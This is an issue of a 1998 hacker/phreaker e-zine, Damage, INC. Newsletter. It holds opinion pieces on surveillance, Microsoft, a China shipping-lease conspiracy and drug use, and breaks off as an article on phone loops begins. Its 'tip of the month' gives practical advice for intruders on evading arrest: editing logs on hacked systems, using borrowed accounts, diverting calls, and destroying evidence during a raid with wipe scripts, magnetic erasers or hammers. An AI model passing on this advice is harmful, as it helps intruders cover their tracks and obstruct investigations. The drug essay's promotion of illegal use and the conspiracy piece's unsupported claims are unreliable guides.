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Newsletter. � BIG BROTHER BASHING - Old civil rights killed by new technologies. � Search String: {BIG BROTHER} � BLACKENED'S TIP OF THE MONTH - Tips on how to avoid being busted. � Search String: {BLACKENED} � CONSPIRACIES AND COVERUPS - Red Long Beach: China controls naval base. � Search String: {COVERUPS} � CORRUPTION AND GREED - Billy Gates and his Overwhelming Need for Greed. � Search String: {GREED} � DRUGS DISCUSSION - The Existence of Drugs in Our Culture. � Search String: {DRUGS} � H/P INFORMATION AND NEWS - Looping the Loop in your area code. � Search String: {H/P} � INTERVIEWS AND INTERROGATIONS - An Interview of THC Phreak. � Search String: {INTERVIEWS} � LETTERS TO THE EDITOR - More feedback about the Damage, INC. Newsletter. � Search String: {LETTERS} � OBJECTIVE OPINIONS - The Consequences of Cloning Humans. � Search String: {OPINIONS} � REPORTS FROM THE FRONT - Caller ID Specifications. � Search String: {REPORTS} � SOURCE AND SCRIPTS - Linux Sniffer source code. � Search String: {SOURCE} � THE JOURNALIST'S TOP TEN LIST - Drugs and their effects. � Search String: {TOP TEN} � THOUGHTS, POEMS AND CREATIVE WRITING - Weakness and Strength. � Search String: {WRITING} � CLOSING COMMENTS - Shatazar's Inaugural Closing Comments. � Search String: {CLOSING} ������������������������������������������������������������������������������� < DISCLAIMER > All articles contained in the Damage, INC. Newsletter are for informational purposes only. Damage, INC. is not responsible for how any of the information presented is used. It is not intended to be a manual with instructions to be followed. We won't be held responsible for any damages caused, illegal acts committed etc. by our readers. If/how you use the information given is entirely up to you. < COPYRIGHT NOTICE > All articles and source code contained within this file are (C) Copyright by Damage, INC. (unless stated otherwise). No part of this work can be modified, reproduced or changed in any way without the expressed written consent of Damage, INC. That means, electronically or otherwise, in part or in whole this file must not be altered. It cannot be included with any other releases. You cannot claim that you wrote it, or alter any articles and source code that has been written and Copyrighted by us. Also, do *not* distribute any Damage, INC. releases in "packages" with other text files or utilities. They must only be distributed alone in their present, original form. You are permitted to read and distribute the Damage, INC. Newsletter freely to quality h/p boards only. Copyright 1998 by Damage, INC. All Rights Reserved. _______________________________________________________________________________ INTRODUCTION: Greetings to our loyal readers that continue to seek the honesty and truth that is in the Damage, INC. Newsletter. In a world that is engulfed in a thick fog of lies, corruption, and hypocrisy, honesty is the bright torch that dispels the darkness. Unfortunately, the fog that surrounds us can also be within a person. When a person believes the lies, ignores corruption, and tolerates hypocrisy, his or her mind is lost in darkness. Only honesty and the truth can burn through the fog, enlightening that person's mind, allowing him or her to expand and grow stronger. However, the torch of honesty can only be grasped by a person that wants to obtain it. Each individual must choose whether they wish to be a zombie or an enlightened human being. For those that choose to learn the honest truth and to grow outwards as a person, the Damage, INC. Newsletter is intended to be a torch to help you on your journey. How you interpret the words within, and whether you agree or disagree with our thoughts and opinions is up to you. As long as you kindle new found knowledge that was presented to you with honest intentions and allow it to burn within you, the truth will be within your grasp. If you accept the truth, you can begin to dispel the fog that may have been planted in your mind. It depends on how hard you will work and fight to learn the truth. BIG BROTHER BASHING - {BIG BROTHER} Old civil rights killed by new technologies. Canadian Charter of Rights and Freedoms; Section 8: "Everyone has the right to be secure against unreasonable search or seizure." Fourth Amendment to the Constitution of the United States of America: "The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized." Protection against unreasonable search and seizure. Well-meaning passages written with the best of intentions. They are designed to prevent citizens, and their possessions, from being frisked without reason by powertripping police officers. To a much lesser extent, they prevent the government and its bureaucracies from invading a citizen's privacy. However, these "protective clauses" were written for tactics used in a different era. In days when there was no recourse for the police, but to physically frisk someone or search a building. New technologies have changed all that. It is now within the Thought Police's power to literally see you naked, with the exception of any other foreign objects you may have near your body... without you even knowing about it. In 1996, Millimetrix Corp. developed what they call a "Passive Millimetre Wave Imager" (PMWI). It allows a cop to "read" the electromagnetic waves that all human beings broadcast. The electromagnetic waves goes right through clothing, but objects like concealed weapons, certain packages, etc., block the waves. Two versions of the PMWI were developed by Millimetrix. A larger version is designed to be placed inside of a police cruiser. By looking at a little monitor installed in his dashboard, the cop can scan a large group of people before he gets out of his car to confront them. A battery powered, hand-held unit was also developed so a cop can virtually strip the clothes off of one person, or a large group of people while on foot. Whom do you believe gave Millimetrix Corp. the funds to develop this privacy-intrusive technology? Big Brother of course. The United States' National Institute of Justice them granted $2.1 million US in order to "protect the United States from terrorist attack." In my opinion, that kind of rhetoric is Big Brother using the "protecting society from crime/terrorism" line again. However, unwarranted searching technologies like PMWIs aren't exclusively in the hands of anti-terrorist agencies. They have given them to ordinary, uniformed officers and installed them in police cruisers. The "boys and girls in blue" are assigned to monitor and bust *us*, not to stop terrorist groups from destroying the "valuable" properties owned by Big Brother and big business. A tremendous bonus for the police is the fact that the PMWI can operate up to 27 metres away from the victim of his unwarranted search. The PMWI can also see through walls to further invade the privacy of all citizens that are under the surveillance of Big Brother. Millimetrix Corp. is quick to point out that the PMWI offers "some privacy." After all, it "does not reveal intimate anatomical details of the person." It allows a cop to perform a body search without the knowledge of the citizen, yet it stops a perverted one from being a virtual `peeping Tom.' Now Big Brother and his cohorts are telling us in essence that there are "varying degrees of privacy." Huh? How it is possible to have varying degrees in privacy? Something is either private, or it is not. Of course you are entitled to your own opinion. Big Brother's message to the zombies in "society" therefore equates to "do as I say, and you will *not* do as I do." Do you think that the majority of people in "society" have bought into this blatant hypocrisy? Oh hell yes! :-( While doing research for this article, I found the results of a survey from the Los Angeles Times. The respondents were asked if they would "curtail some `civil liberties' if it would help thwart terrorism." Fifty-eight percent said yes, they would willingly surrender their civil rights to Big Brother. An additional 13 percent said "it would depend on what rights were at stake." Whether the survey was doctored by the Los Angeles Times on behalf of Big Brother, or is legitimate, the result will influence many people to go with the grain and agree with the majority. Let's burn through the rhetoric and lies that Big Brother spreads in an attempt to brainwash all citizens. In truth, the Constitution, the Bill of Rights and the watered down Canadian equivalent, the Charter of Rights and Freedoms, and the court's fleeting adherence to them is Big Brother's largest road block. Big Brother wants to limit our actions and thoughts in order to control us. By buying into the overblown fears of terrorism, Big Brother's supporters within "society" have allowed Big Brother to slice away at our constitutional rights until they are virtually meaningless. I feel the "majority of people" should not be so paranoid about terrorist attack. Big Brother is more of a threat to their quality of life than any terrorist could possibly be. Unless the wish of the "majority" is to live in the oppressive totalitarian state that Big Brother is creating. :-( Written by Shatazar � Damage, INC. (C)opyright 1998. BLACKENED'S TIP OF THE MONTH - {BLACKENED} Tips on how to avoid being busted: These are only basic tips on how to avoid being busted. Some of them are based upon my personal experience, some of them are used by others, and the remainder are just ideas. You must use your own common sense and judgement. I am by no means promoting, advocating or condoning hacking/phreaking. In fact, the following tips can be applied to other activities that are totally legal if you just want to protect your privacy. They're for informational purposes only. If you want to hack or phreak and apply them to that, then it's your choice and you are free to do so. However, Damage, INC. isn't responsible if you use these techniques, do something illegal and get busted. I would advise that you always be cautious, h/p safely and take any measures necessary to ensure that you aren't being traced though... if you are going to get involved in hacking and phreaking. Always remember that "ignorance of the law" and "being a newbie" aren't acceptable excuses to law enforcement. They will bust you, regardless of what excuses you make, your level of experience or the amount of years that you've been involved in h/p. In fact, many of the people that are getting busted are newbies. Most of the others think that they're invulnerable, due to their ego and pure arrogance. Don't allow that to happen to you. Don't get sloppy, make stupid mistakes, and be easily traceable. Read every article that you can relating to being busted and how to avoid it. You can learn and benefit tremendously from reading about someone else's bust experience, and thus avoid foolishly repeating the exact same mistakes as they once did. If you are arrogant and think that you don't need to know about protection against being busted, then you're on your own and can say "I wish I knew then what I know now." or "I wish I hadn't done that." from behind bars. Either way, you'll only have yourself to blame. Section 1: Trust. Trust is such a small word, is often overlooked and yet in reality it's the basis of everything. Trust is also the most important thing of all. If possible, trust no one. Meaning, don't tell people about your h/p activities and trust them with that information. Don't brag to other hackers/phreaks (or anyone else for that matter) either. In fact, you shouldn't even tell your personal friends certain things (especially not over the phone). ;) If you do that, then you risk getting busted. It's not necessary, so why put yourself at risk? Plus, they could rat you out if they happen to get busted... in exchange for a lighter sentence (making a deal, plea bargaining). If you can't abide by that rule/tip, then be *very* careful about who you trust and what information you trust them with. I realize that it's difficult not to trust anyone, but it's the safest method with certain sensitive (illegal) information. There are certain documents etc. that you shouldn't distribute to others under any circumstances. If you have known someone for the majority of your life, then you should at least consider limiting your trust of them. Trust should never be given out quickly and easily. Don't just trust them with everything. Otherwise, it could come back to haunt you. You cannot predict whether or not someone that you 'trust' will betray you in the future. Obviously, each person's situation is different. Always try to use good judgement. Think of the possibilities, consequences etc. before you entrust someone with specific information that could lead to you being busted. Don't give out access freely to anything that could be used against you as evidence. That includes your system, files, codes, detailed stories describing what you've done and anything else that you think *might* turn out to be harmful to you. Basically, be careful with what you type and and say in voice conversations. Sometimes your friends can be enemies willing to testify against you. Never forget that. Section 2: Encryption. Is encryption safe? Is it reliable and fool proof? Can they bust me, decrypt all of my data and use it in court as evidence against me? If encryption won't protect me then should I bother to encrypt files? In this section, I'll attempt to answer these important questions. However, if you want more information then I suggest that you read and learn more about cryptography. Some methods of encryption aren't "safe" to use, thus they should be avoided. *Any* encryption that conforms to standards set by the government is unsafe. If you suspect that you're using an encryption program that abides by the government standards, quit using it immediately. Then find out which ones don't and switch to that one. Make absolutely sure that you know it doesn't conform before you start relying on it. In other words, do some research first. However, regardless of what type of encryption you use, your data still isn't completely safe and secure anyway. Why not? The reason is that it relies on a password. That is the weakest link in encryption, and that's what will be first attacked by law enforcement and then exploited. So, even if you've encrypted your entire hard drive, backups etc. they can still use brute force to decrypt it and access everything. Meaning, they'll simply use password cracking utilities to do the job for them. Also, keep in mind that they'll confiscate your computer system and anything computer related near it... which gives them an unlimited amount of time to work on it. That's what search and seizure means. Just because you don't keep information (codes etc.) in plaintext files or written down on paper etc. doesn't mean that you're safe. Just as, if you think a long password (as an example, one more than the typical 8 characters password that many people use) is going to protect you, then you're wrong. It won't stop them. No encryption offers total protection and security... not even 128 bit. Even so, you should encrypt lists of codes and anything else that you feel could be used against you. It won't keep all prying eyes from reading and/or accessing it but at least it offers minimal security. You can also use encryption in combination with programs/devices that will destroy the encrypted data in a bust situation. More information on that will be mentioned in the following sections. Section 3: Precautions and Prevention. Obviously, you want to prevent yourself from ever getting busted. If you hack or phreak, you don't want to be detected and traced. How does one avoid detection? What precautions should be taken? What methods are "safe"? What does stealth mean? Are these measures really necessary to protect myself and my privacy? In this section, I'll answer those important questions and also give you some other sources of reliable information to consult. First, the importance of prevention cannot be overstated. If you actively work and think of ways to prevent yourself from being detected, then your chances of actually being busted will be decreased significantly. Your motivation to do this should be the fact that if you're actively involved in h/p and you take no steps to avoid detection, then eventually you'll end up serving time due to your own arrogance and ignorance. Don't let your ego cloud your judgement. Never assume that it'll never happen to you. Logic dictates that anyone that hacks/phreaks can be busted, regardless of what level you're at, how much you think you know, how popular and well known you are in the h/p scene. So, we encourage you to take these steps to avoid being detected and busted. That's not an easy task though, so don't become overly confident. Constantly being stealthful requires a lot of effort and thought if you're going to be successful at remaining undetected and anonymous while hacking/phreaking. Here are a few tips to consider following: -/- Don't have phone lines etc. installed in your real name. Make sure your number is unlisted as well. -/- Don't give your real name, address, phone number etc. for any accounts on networks. That includes ISPs, if you pay for accounts. I'd advise that you borrow other people's instead though. -/- Don't dial anything directly that you're hacking. Always divert and dial through multiple things like networks etc. to prevent being easily traced. -/- Always examine and edit all logs on the systems that you hack. Make sure that copies of the logs aren't sent elswhere on the system. Look for email daemons on admin accounts etc. Not all systems are the same and use default paths, so be careful. -/- Avoid attending all of the hacker conventions (like Defcon etc.), and be aware of the fact that they're monitored. Don't become too "well known". Popularity is good for your ego, but obviously makes it easy to identify you. -/- Don't get caught up in socializing with other hackers/phreaks and give them personal information about yourself. Never assume that they're not being investigated or won't rat you out. Many hackers are caught because someone else they know got busted and cooperated with the law enforcement authorities. So, be careful not to give out your phone number, real name, address, information about what you're hacking etc. to people. Hackers often setup or turn in other hackers. Many have worked with law enforcement after they've been busted...and help catch whoever they're told to. So, be stealthful whenever possible. -/- Don't transit personal data to other systems. That includes ones that you've hacked. Never store documents or "trophies" taken from other systems that you've hacked on an insecure system. They can trace it back to you if you do that. They can find out where you've called, check those systems, find the files and that's proof enough of where you got them from. -/- Use different handles/aliases/login IDs on systems when you setup accounts. That way, it won't be so obvious and easy for them to link together. -/- Keep your hacking activities seperate from everything else. If you use computers at a University, or a network, for normal use, don't use the same systems for hacking purposes. Check around for and be aware of cameras whenever you're using a system in a lab. Also, if you do go to remote locations to hack/phreak, don't follow any regular schedule. Be observant and watch for anything or anyone that seems out of place. If something isn't right, leave. Sometimes law enforcement will figure out that you use systems or phones at certain places, and wait there for you to arrive. -/- Don't become predictable. Falling into the trap of doing the same things from the same places and getting too "comfortable" with your surroundings can end up being your downfall. Never assume that you're safe. If at all possible, move to different areas. If you live in the same place for too long, then it's simple for them to track you down. Plus, with the same phone number, they can log all of your outgoing calls etc. easily. -/- Be careful with which PBXs, extenders, loops, other codes you use. Learn about ANI. Also, if you're using an extender or loop to divert, be sure to check it several times by dialing an ANI to be certain that it can be used as a working diverter. Dialing through multiple extenders that divert may not be enough. In fact, it may even harm you. -/- Be careful when using any outdials etc. and know what you're doing. -/- Don't get into carding, malicious hacking etc. It'll only lead to you getting busted. If you're already involved in that, quit now. -/- Never destroy or edit any data on systems you've hacked into unnecessarily. That means, only edit logs etc. to cover your tracks and leave the rest as is. -/- Don't use IRC to chat with your friends in channels like #519, #warez etc. If you associate with lamers like that, then you'll eventually get caught. Avoid using the same alias while on the net. Again, be stealthful (or completely anonymous) if at all possible. If you can access the net anonymously, spoof your IP, etc. that still may not be enough if they they really want to get you. Plus, IRC is logged and monitored. -/- Data/Voice numbers that you dial using your modem/phone can be used to track you down... regardless if you move. If you dial the same numbers (a friend, a certain system, a certain BBS, whatever) frequently, that data is recorded. Therefore, even if you've moved several times to different cities/states/provinces, the telco can still trace you because of that. They can just cross reference it with all of the incoming calls to that particular number. They can also question the person that owns that line. -/- Learn how to check your line for taps. Take any measures that you can to make sure that it's secure physically. By that, I mean look at it and see if it's been tampered with etc. and learn more about meausures that you can take to protect it. -/- Be observant. If you think that you're under surveilance, then take the steps discussed below about destroying data. There are quite a few other things that you can do to avoid being detected and busted. Agent Steal had a few interesting ideas in his Phrack article that are hardware based. One was what he referred to as a Stealth Box. It actually isn't that complex and doesn't require a lot of electronics knowledge. You need two modems etc though. ;) There are many other things that could've been included in this article, but it's already quite lengthy. Section 4: Destruction of evidence. I'm not advocating or encouraging obstruction of justice. However, if you are about to be busted and feel the need to destroy any so-called "evidence" that may exist on your system, here are a few ideas. First, hopefully your sensitive data is already encrypted. It's not a good idea to store codes, documents etc. in plaintext format. Second, you'll need to have a copy of the NUKE utility by Damage, INC. in your path. Third, you should create a BUST.BAT file that includes commands such as "NUKE C:\STUFF\*.*" for the areas that the files you want to nuke are stored in. The batch file just makes the entire procedure much quicker, which can be crucial in critical bust situations. If said files are encrypted (with non-standardized, non-conforming encryption), then nuked by NUKE... most likely the feds won't be able to use any of it against you. However, they can charge you for obstruction of justice but that's minor in comparison. Of course, it all depends on what they *could've* burned you with. So, it's a tradeoff in a sense. Another good idea is to have a bulk magnetic eraser mounted next to your hard drive. Put a switch close to your computer, so that it's easily accessible. Or, even better than that, install several switches for it in different locations and you can activate the device from more than one room. Agent Steal's article in Phrack mentions doing the same thing, among others. I've personally seen/used bulk erasers before and know how quickly they'll erase data when the hard drive is powered up and spinning. ;) The last resort is to use a steel hammer to physically smash the hard drives. Even if you're desperate and time is running out (ie, the feds are breaking down your front door), you should still have the necessary seconds to execute those saving actions. I recommend that you have everything setup and ready to use in case of a bust. Afterall, if you're not prepared then it's too late to do anything when you're taken by surprise. That's why people get busted and their systems are confiscated with everything still intact. Basically, you have two options at that point: Let them take your system, get a lawyer, and try to fight them in court... Or, do everything in your power to destroy the evidence, obstruct the investigation any way that you can and face the lesser charge of obstruction of justice. In closing, I recommend that you read Agent Steal's article in Phrack issue #52 on getting busted. Minor Threat also contributed to it. Their first hand accounts and experiences with the court/prison system are a must read. It's accurate and contains some excellent information. Obviously, Damage, INC. hopes that you've learned something from reading this article and wishes that you none of you get busted. However, some of you will. If you are busted, don't rat out your friends. Only scum...the lowest of the low would do that to save their own ass. My final words of advice to you are: be wise, be stealthful and extremely cautious. ;) Written by BLACKENED � Damage, INC. (C)opyright 1998. CONSPIRACIES AND COVERUPS - {COVERUPS} Red Long Beach: China controls naval base. As many people know Communist China is a place where free thoughts land Chinese men and women in prison (slave) camps, and expressing them earns the person a bullet (paid for by the surviving family) in the back of the head. China is the enemy of the United States of America and its allies. In fact, they are conspiring with Russia to create their own world order. However, that is the subject of another article. Despite the fact that the Chinese communists hate our way of life, and openly instigate conflicts, like the "war games" scenario off the shores of Taiwan, "democratic" countries continue to cut economic trade deals with them. It is sickening how hypocritical the United States and Canada are when both bring up human rights whenever they sign the latest multi-million or billion dollar deal with Red China. By supporting them economically, countries that trade with China are also supporting the oppression the communists impose on the Chinese people. There have been some extremely disturbing "side deals" that have come to light. One deal centers around a closed U.S. Naval Base in Long Beach, California. With the support of president Bill Clinton, the Long Beach Naval Base has been refitted and leased to the China Ocean Shipping Company (COSCO). This conspiracy started in 1991 when George Bush decided that the Long Beach Naval Station should be shut down in order to save money. In 1993, Bill Clinton finished what Bush started by making sure that the naval base was permanently closed. That decision lead to a loss of over 17,500 military and civilian jobs, and crippled Long Beach's economy. There was little interest in the abandoned base until the end of 1995. The Chinese got involved during a period of time when the Clinton-Gore campaign was heavily involved in fund raising. Clinton and his administration secretly attempted to setup a sweet lease deal that would "entice" COSCO to take up residence in the old Long Beach Naval Station. The Secretary of the Navy turned over control of the closed naval base to the City of Long Beach, which had an estimated value of $65 million, free of charge. Taxpayers in Long Beach paid approximately $200 million to convert the naval base into a cargo port. The city then turned around and leased the naval base to a foreign shipping company that is owned and operated by Communist China. The communists have signed a 10 year lease at the cost of $14.5 million per year. The lease also gives the communists the option of forcing the City of Long Beach, at their expense, to develop an additional 150 acres of the old shipyards. I believe that China told Clinton what they wanted, in this case the Long Beach Naval Station, and Clinton accommodated them without any delay or red tape. I have some facts that prove that the Clinton administration has links to the Chinese. Many powerful Democrats tried to coverup the fact that they took campaign donations from prominent Chinese that operate within the United States. When the Chinese contributions were revealed, the Democrats desperately attempt to seek forgiveness from the American people. House minority leader Richard Gephardt, Senate minority leader Tom Daschle, and others claim to have refunded these communist payoffs. Also, if Clinton and his administration were not under the influence of the Chinese, then why would they choose not to investigate COSCO with the National Security Council, the Navy, or the CIA? That is exactly what happened. To quote a White House spokesman named Lanny Davis "there seemed to be no reason to check with the National Security Council on the decision." Clinton didn't want his sweet Chinese deal compromised by the NSC or the CIA. Meanwhile, COSCO was caught smuggling Russian AK-47s into Oakland, California. A COSCO liner rammed into a busy New Orleans boardwalk. Luckily there were no fatalities, but 116 people were injured. COSCO also admitted to dumping 640 tons of raw waste into the ocean instead of taking it to China. In 1993, the U.S. Navy spied on a COSCO ship that they believed to contained chemical weapons components when it entered the Persian Gulf. In 1992, COSCO was fined $400,000 for attempting to bribe U.S. officials in order to avoid paying tariffs on the goods that they wanted to import into the United States. Also, the United States Coast Guard has placed COSCO on its list of "ships to monitor and search" because of various infractions against many international safety regulations. It is revolting how Clinton has endangered the security of the United States of America. Even though the NSC and CIA are untrustworthy, and are guilty of their own conspiracies and coverups, the fact that Clinton avoided consulting them can only mean that the communists have offered or given Clinton something that he desperately wants. Clinton must have some kind of self-serving reason why he would sell the United States, piece by piece, out to its enemies like Red China. Another disturbing fact is that a simple mayor and his local civil employees were allowed to negotiate this lease without any thought to the security of the United States. Setting aside the corrupt business practices of the China Ocean Shipping Company, the fact that they are operated by communists should have immediately disqualified them from operating a cargo port in Long Beach. There is no doubt in my mind that the Chinese will use the Long Beach Naval Station as a central base for their own intelligence agents. That is the reason why two Republican congressmen actually attempted to stop the Chinese from taking over the Long Beach Naval Station. The congressmen were concerned that COSCO would be able to smuggle goods into the United States much easier, as well as a base for Chinese intelligence. However, after a long battle, it was determined that the lease would be killed if Clinton did not use his "waiver authority" to save it. Hmmm... in the end the communist-supporting president, who tried to coverup the fact that he pushed for the lease of Long Beach Naval Station to the Communist China shipper had the final decision on the matter. Unfortunately, I believe that the Red Long Beach conspiracy is only a small one within a much larger conspiracy. Bill Clinton's actions show him to be a tremendous backer of Communist China, even at the expense of the security and economy of the United States. Why would Clinton push the loss of hundreds of millions of dollars so it is easier for the Chinese to spy upon the U.S., as well as smuggling illegal goods, or even weapons of mass destruction? That is a question that all Americans should be asking of their president and his administration. Unfortunately, in order for the truth to be revealed, Americans will have to stop being sidetracked by trivial "issues." Written by Shatazar � Damage, INC. (C)opyright 1998. CORRUPTION AND GREED - {GREED} Billy Gates and his Overwhelming Need for Greed. Micro$oft is a huge, corrupt, greedy corporation. They've demonstrated repeatedly that they have no regard for other software companies and their goal is to buy out the competition. Obviously, they aren't satisfied with their current stranglehold on the industry. They want nothing less than a total monopoly. This article isn't about statistics. I'm not going to quote figures of their quarterly or yearly profits, sales etc. If you want to know that information, then I'm sure you can find it by checking out a few web sites on your own. Basically, I want to expose Gates and his company Micro$oft, to show just how greedy and corrupt they really are. Gates' estimated net worth is over $40 Billion U.S. dollars, and Micro$oft is estimated to be worth $400+ billion dollars. Both amounts are increasing so rapidly that it's not possible to include statistics that are more accurate than that. In fact, it's been reported that Billy Gates has made over $100 million dollars in a single day on occasion. I wonder if he considers that to be a good day, or a bad day? At any rate, that should be an indication of his wealth. To put it bluntly, he's stinking fucking rich. He's not just your average, run of the mill, fat cat. Gates is literally the fattest cat of them all... and he's only getting fatter as each day passes. How much money is enough for one man? How much power and control over an entire industry is enough? Why do people support, defend and have sympathy for Mr. Billy Gates? To be honest, I'm not sure why anyone would defend Micro$oft and Gates. I also don't know why people are so sympathetic towards a wealthy geek that fears close contact with the public. I simply don't understand their reasons or "logic" for doing so. In order to put things into perspective, I'll give you a comparison to ponder. Billy Gates has more personal wealth than the 50 richest Canadians combined. He has more money than the countless thousands of citizens in Canada that are living at or below the poverty line combined. If he were hypothetically inclined to help them, he could virtually eliminate poverty within this entire country (with a current population of over 25 million people). Indeed, tiny million dollar donations to "charity" on his part are a mere token... a pittance... in comparison to the vast amount that he's accumulated. Those that defend Gates and Micro$oft remind me of the 17th century English paupers that had nothing and yet they continued to support their king. Micro$oft supporters and defenders are like zombies. They've been so utterly brainwashed that they know not what they do. In essence, they are not responsible for their words or actions. They're so ignorant and naive that they actually believe Gates deserves all that he has, and more. Again, how much money is enough? Would $100 billion be enough? $200 billion? Perhaps $500 billion is just scratching the surface of what is considered to be enough. To some people, no sum of money is enough to satisfy them and their need for greed. Billy Gates donated some money to Harvard (which is obviously a huge tax writeoff), but is that really a legitimate charitable donation? Not in my eyes it isn't. Harvard is an ivy league school for rich kids in my opinion. Also, Gates has been quoted as saying that he plans to donate more money to charity once he "retires" from the business world. That's a pleasant and comforting thought. ;) When does Billy plan to resign as the CEO of Micro$oft? At what point will he have amassed enough cash for his retirement? What will his retirement home look like? Which tropical islands will he purchase for summer homes? Just try to imagine it. It's definitely a sickening thought. As for Micro$oft, I'll leave their corrupt practices for another article. I'd just like to comment on the greed of that company (some people almost see it as an entity). Why is Micro$oft so respected? Why do they generate so much support? Why are they defended by Win95 d00ds? Why does the media give them any positive press? I feel that Micro$oft is respected and supported by the zombies that cannot use software that doesn't have point and click mouse support. Basically, they need icons, pulldown menus, drag and drop etc. which is exactly what Windoze gives them. They can't use a commandline and need to use a GUI driven "operating system" that has the options right on their screen. They also rely on Windoze to control their system. Otherwise, they wouldn't be able to use a computer at all. Their keyboards just sit there and collect dust. The Windoze zombies respect Micro$oft for making their systems so zombie friendly...err user friendly. They absolutely love hardware such as Winmodems that's made just for Windoze... It's hardware that's been made exclusively for them...Windoze d00ds. The zombies also support Micro$oft because they say that it's "popular" and "Windoze is the industry standard" and "the quantity of software that's available for Win95" etc. Many of them also program in Visual Basic since it's by Micro$oft and extremely easy to learn. As for the mass media, they've always supported big business. The bigger a company is, the better. The larger they are, the more coverage they get. It's just free advertising for Micro$oft since their loyal zombie followers won't abandon them no matter what. Under no circumstances will the Windoze zombies even try out software by another company. It's a sacred rule of the zombie clan. They're strictly forbidden within their ranks from switching software. I can still vividly remember the masses of zombies rushing into stores to buy Win95 (as many copies as they could physically carry) as soon as it was released. That image is burned into my mind and will never be forgotten. They literally fought each other and greedily grabbed as many shrink wrapped Windoze 95 boxes as they possibly could. I'm sure there will be another 'battle of the Windoze zombies' once Windoze 98 is finally released. On a side note, it was hilarious to see Win98 crash and burn at the Chicago computer convention as Gates and countless others watched. That moment was one of the greatest in the history of television in my opinion. Billy Gates didn't look surprised in the least, but merely embarrassed and perhaps slightly humbled by the experience. However, his massive ego is no doubt still intact. He should be ashamed of his inferior product and his business corrupt business practices. In conclusion, I'm sure there will be other articles written on Micro$oft in future issues of the Damage, INC. Newsletter. My only intention for this article was to make people think seriously about greed. Therefore, I chose the best and most appropriate example of greed that exists today. Hopefully it has informed and enlightened you somewhat. Written by BLACKENED � Damage, INC. (C)opyright 1998. DRUGS DISCUSSION - {DRUGS} The Existence of Drugs in Our Culture. Being brought up in today's society, you could easily come to the conclusion that there is an illegal drug problem within our nation. Lower class people who use drugs and alcohol to escape their pains; kids who do anything to get high... Unfortunately what you don't find out about is the number of people addicted to prescription drugs. Or the number of times an alcoholic father beats his kids. Or perhaps the stock broker who drinks 12 cups of coffee a day just to get by. Yes.. I would have to say there is a problem in our society. But it's not an illegal drug problem. I don't know any crack addicts, nor do I know any heroin junkies. But the number of alcoholics I know is staggering; as is the number of addicted cigarette smokers. Yes, there definitely is a problem. The problem occurs because we try to hide from natural processes. We try to control our desires. We are made to feel guilty for wanting to get high, or drunk. Yet these are animal traits. There are certain flocks of birds that know eating fermented berries will cause pleasure, and a drunkenness. Every year they will return to the same tree, because inside they know that getting inebriated relieves stress. It relaxes the body and mind. It is beneficial to them, so that is why they do it. Interestingly, some birds don't know when to stop... and will keep eating these alcoholic berries until they die from poisoning. There are many other species who also seek out ways to get drunk. Man cannot run away from his inner desires. He cannot suppress the drive; nor can he label certain items as "narcotics" and do everything in his power to obliterate them. Only when we realize *why* we do drugs, will we be on our way to understanding their existence in our world. Why do we do drugs? That is a very valid question. Essentially, it is the desire to alter one's state-of-consciousness. Drugs induce these states of consciousness by manipulating, or mimicking neurotransmitter chemicals in your brain. The chemicals in your brain determine your state of consciousness. This is a very important statement, and I want you to re-read it. Basically, whenever you put something in your body, you alter your state of consciousness. So altering your state of consciousness is not a new concept to your personality at all - eating sugar affects your state of mind. What differs between states is the distance you shift from your original state of consciousness to the new one. Drugs accelerate your mind to a higher plane. Rather quickly too, that is why some people don't enjoy it. Taking drugs is just a means to manipulating and directing the focus of your attention. People do drugs for the same reason anybody does anything else - because they find it interesting. Upon reading this paragraph, I realize I am guilty of something. I have been using the word "drugs" too vaguely to convey my thoughts. I am generally talking about the benign drugs such as alcohol, marijuana, opium, and tobacco. Psychedelic/hallucinogenic drugs are a much more complicated subject. And uppers such as cocaine and speed are based more on the nature of addiction. To get the most out of this article, re-read the last paragraph now knowing specifically which drugs I am talking about. Now we have established that people get high because they find it interesting. Well, I hate to sound like a 3 year old, but shouldn't we be asking "why is it interesting?" Or more specifically, what is interesting about altering one's state of consciousness? Well, recall the March 1998 issue of the Damage, INC. Newsletter. Myself, and group members talked about some very interesting aspects of consciousness, such as astral projection, and the power of your mind. If you're not familiar with those subjects, perhaps you should read, or re-read last month's Newsletter. To continue, drugs are a physically oriented method of going into trance. People who abuse drugs such as marijuana, alcohol, LSD, psilocybin (magic mushrooms) are a lot of the time people who are aware of themselves, and the divine potential within them; but unfortunately their inner battle is with laziness. So instead of diligently meditating for six months, they take a hit of acid, or smoke a fat joint, experiencing a distorted, yet pleasurable version of the same thing. This explains why drugs have, and always will exist in our culture. Their use, and even abuse always promotes growth and learning within an individual. Drugs expand awareness. Drugs help solve problems. Drugs can also help cause problems if one is not careful ;). Drugs soothe pain (emotional and physical). Drugs can be spiritual. Drugs are also symbol. They are a symbol of man's struggle with self-awareness, and thirst for understanding. Some cultures, such as the Mayans, believed that the Magic Mushroom was a gift from the gods. A gift of awareness to bring peace and enlightenment. The story is a lot different today unfortunately. These once sacred mushrooms are now considered harmful. By suppressing drugs, we are suppressing the utter delight of looking at ourselves in the mirror of awareness. The effects have been detrimental; perhaps even devastating. The war on drugs is hurting our society every minute it is being enforced; drugs are entwined in our lives, whether you are aware of it or not. These drugs that have been categorized as "controlled substances" cannot be eradicated, nor banned from use. How ironic it is, to note that the drugs are not really being controlled at all. In fact, the opposite is occurring. In the drug war, it is not the law enforcement who are winning. The only thing they are doing is ruining our nation. They kill lots of people in the process of controlling drugs. They also waste a lot of well needed tax dollars. Groups who inform their audience using propaganda and lies should *not* be groups worthy of your trust. Another sad fact, is that the drug war is a result of ignorance, and corruption. Cannabis was originally made illegal because its potential as a fabric was hurting the cotton and timber industries. The big-wigs who owned these operations coerced the government into criminalizing marijuana because it was a form of hemp. Hemp that can be used to make clothes, paper, and to basically replace the disgusting logging companies. Greed reared its ugly head, and attempted to wipe out this profit killing plant. They succeeded for many decades, but finally Ontario has decided to stop the destruction of our planet, and allow industrial hemp to be grown by farmers. This is a step in the right direction, but marijuana still remains a controlled substance. And while the ignorant enforcement of these archaic laws remains in our society, people will travel further and further away from themselves, and what they know to be true. I genuinely hope people realize this soon. Drugs are an inherent part of our nature. They exist as tools to help us understand ourselves and the universe. Next month: Blackened discusses decriminalization. Written by The Journalist � (C)opyright 1998 Damage, INC. H/P INFORMATION AND NEWS - {H/P} Looping the Loop in your area code. This short article on loops is the first that I've submitted to the Damage, INC. Newsletter. I hope that you enjoy reading it 